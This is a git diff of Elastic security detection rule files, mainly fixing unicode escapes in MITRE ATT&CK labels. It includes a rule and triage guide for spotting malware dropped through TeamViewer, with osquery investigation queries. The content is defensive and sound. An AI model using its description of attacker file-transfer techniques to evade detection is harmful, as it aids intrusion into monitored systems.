b/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_102.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_103.json b/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_103.json index 52dc2d0a053..89fafd00230 100644 --- a/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_103.json +++ b/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_103.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_104.json b/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_104.json index f5c78b3662e..bc9d35630a5 100644 --- a/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_104.json +++ b/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_104.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_105.json b/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_105.json index a4326a09891..979517b882f 100644 --- a/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_105.json +++ b/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_105.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/b0638186-4f12-48ac-83d2-47e686d08e82_1.json b/packages/security_detection_engine/kibana/security_rule/b0638186-4f12-48ac-83d2-47e686d08e82_1.json index 1fb22352971..a1c7513992b 100644 --- a/packages/security_detection_engine/kibana/security_rule/b0638186-4f12-48ac-83d2-47e686d08e82_1.json +++ b/packages/security_detection_engine/kibana/security_rule/b0638186-4f12-48ac-83d2-47e686d08e82_1.json @@ -46,7 +46,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -68,7 +68,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b2318c71-5959-469a-a3ce-3a0768e63b9c_1.json b/packages/security_detection_engine/kibana/security_rule/b2318c71-5959-469a-a3ce-3a0768e63b9c_1.json index 0bb7ce92c6c..d43f2c95533 100644 --- a/packages/security_detection_engine/kibana/security_rule/b2318c71-5959-469a-a3ce-3a0768e63b9c_1.json +++ b/packages/security_detection_engine/kibana/security_rule/b2318c71-5959-469a-a3ce-3a0768e63b9c_1.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/b2318c71-5959-469a-a3ce-3a0768e63b9c_2.json b/packages/security_detection_engine/kibana/security_rule/b2318c71-5959-469a-a3ce-3a0768e63b9c_2.json index a0f8a527e18..bb6edeb4436 100644 --- a/packages/security_detection_engine/kibana/security_rule/b2318c71-5959-469a-a3ce-3a0768e63b9c_2.json +++ b/packages/security_detection_engine/kibana/security_rule/b2318c71-5959-469a-a3ce-3a0768e63b9c_2.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", 
@@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_104.json b/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_104.json index 7a08c023197..4f044bcc367 100644 --- a/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_104.json +++ b/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_104.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Copy via TeamViewer", - "note": "## Triage and analysis\n\n### Investigating Remote File Copy via TeamViewer\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse legitimate utilities to drop these files.\n\nTeamViewer is a remote access and remote control tool used by helpdesks and system administrators to perform various support activities. It is also frequently used by attackers and scammers to deploy malware interactively and other malicious activities. This rule looks for the TeamViewer process creating files with suspicious extensions.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Contact the user to gather information about who and why was conducting the remote access.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether the company uses TeamViewer for the support activities and if there is a support ticket related to this access.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. 
Analysts can dismiss the alert if the company relies on TeamViewer to conduct remote access and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Remote File Copy via TeamViewer\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse legitimate utilities to drop these files.\n\nTeamViewer is a remote access and remote control tool used by helpdesks and system administrators to perform various support activities. It is also frequently used by attackers and scammers to deploy malware interactively and other malicious activities. 
This rule looks for the TeamViewer process creating files with suspicious extensions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Contact the user to gather information about who and why was conducting the remote access.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether the company uses TeamViewer for the support activities and if there is a support ticket related to this access.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate 
potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the company relies on TeamViewer to conduct remote access and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and process.name : \"TeamViewer.exe\" and\n file.extension : (\"exe\", \"dll\", \"scr\", \"com\", \"bat\", \"ps1\", \"vbs\", \"vbe\", \"js\", \"wsh\", \"hta\")\n", "references": [ "https://blog.menasec.net/2019/11/hunting-for-suspicious-use-of.html" 
@@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "b25a7df2-120a-4db2-bd3f-3e4b86b24bee", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_105.json b/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_105.json index fa6458260f4..d8c112ffb39 100644 --- a/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_105.json +++ b/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_105.json 
@@ -14,7 +14,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Remote File Copy via TeamViewer",
- "note": "## Triage and analysis\n\n### Investigating Remote File Copy via TeamViewer\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse legitimate utilities to drop these files.\n\nTeamViewer is a remote access and remote control tool used by helpdesks and system administrators to perform various support activities. It is also frequently used by attackers and scammers to deploy malware interactively and other malicious activities. This rule looks for the TeamViewer process creating files with suspicious extensions.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes.
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Contact the user to gather information about who and why was conducting the remote access.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether the company uses TeamViewer for the support activities and if there is a support ticket related to this access.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the company relies on TeamViewer to conduct remote access and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
+ "note": "## Triage and analysis\n\n### Investigating Remote File Copy via TeamViewer\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse legitimate utilities to drop these files.\n\nTeamViewer is a remote access and remote control tool used by helpdesks and system administrators to perform various support activities. It is also frequently used by attackers and scammers to deploy malware interactively and other malicious activities. This rule looks for the TeamViewer process creating files with suspicious extensions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes.
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Contact the user to gather information about who and why was conducting the remote access.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether the company uses TeamViewer for the support activities and if there is a support ticket related to this access.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the company relies on TeamViewer to conduct remote access and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and process.name : \"TeamViewer.exe\" and\n file.extension : (\"exe\", \"dll\", \"scr\", \"com\", \"bat\", \"ps1\", \"vbs\", \"vbe\", \"js\", \"wsh\", \"hta\")\n",
 "references": [
 "https://blog.menasec.net/2019/11/hunting-for-suspicious-use-of.html"
@@ -53,7 +53,7 @@
 ],
 "risk_score": 47,
 "rule_id": "b25a7df2-120a-4db2-bd3f-3e4b86b24bee",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_106.json b/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_106.json
index 677cb764bac..58c870069bb 100644
--- a/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_106.json 
@@ -14,7 +14,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Remote File Copy via TeamViewer",
- "note": "## Triage and analysis\n\n### Investigating Remote File Copy via TeamViewer\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse legitimate utilities to drop these files.\n\nTeamViewer is a remote access and remote control tool used by helpdesks and system administrators to perform various support activities. It is also frequently used by attackers and scammers to deploy malware interactively and other malicious activities. This rule looks for the TeamViewer process creating files with suspicious extensions.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes.
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Contact the user to gather information about who and why was conducting the remote access.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether the company uses TeamViewer for the support activities and if there is a support ticket related to this access.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the company relies on TeamViewer to conduct remote access and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
+ "note": "## Triage and analysis\n\n### Investigating Remote File Copy via TeamViewer\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse legitimate utilities to drop these files.\n\nTeamViewer is a remote access and remote control tool used by helpdesks and system administrators to perform various support activities. It is also frequently used by attackers and scammers to deploy malware interactively and other malicious activities. This rule looks for the TeamViewer process creating files with suspicious extensions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes.
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Contact the user to gather information about who and why was conducting the remote access.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether the company uses TeamViewer for the support activities and if there is a support ticket related to this access.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the company relies on TeamViewer to conduct remote access and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and process.name : \"TeamViewer.exe\" and\n file.extension : (\"exe\", \"dll\", \"scr\", \"com\", \"bat\", \"ps1\", \"vbs\", \"vbe\", \"js\", \"wsh\", \"hta\")\n",
 "references": [
 "https://blog.menasec.net/2019/11/hunting-for-suspicious-use-of.html"
@@ -53,7 +53,7 @@
 ],
 "risk_score": 47,
 "rule_id": "b25a7df2-120a-4db2-bd3f-3e4b86b24bee",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
